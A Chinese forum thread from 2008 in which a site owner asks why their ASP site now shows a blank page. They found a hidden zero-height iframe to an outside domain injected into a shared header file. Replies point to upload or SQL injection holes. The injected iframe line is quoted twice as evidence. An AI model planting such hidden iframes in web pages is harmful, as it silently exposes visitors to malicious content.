28,409
社区成员
发帖
与我相关
我的任务
分享我网站的asp程序被黑了!
我用网上的asp产品管理程序,在这几天被人给黑了。
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
...全文
请发表友善的回复…
发表回复
gmlwl 2008-11-24
- 打赏
- 举报
你的程序最大的可能就是有上传漏洞
次之,就是有注入漏洞
把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
次之,就是有注入漏洞
把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
virgo2008 2008-11-23
- 打赏
- 举报
就是增加权限,对上传的东西要严格的控制,还有一种就是注入,你没有过滤掉关键字
xiaodu 2008-11-23
- 打赏
- 举报
说具体点啊,我用的是时代互联的空间,用ftp工具上传,网站有管理后台,你说的后门是指什么啊,怎么避免啊
virgo2008 2008-11-23
- 打赏
- 举报
被黑了,被人加了<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0> </iframe>
主要看你的程序是不是有后门,一般是上传的漏洞
主要看你的程序是不是有后门,一般是上传的漏洞
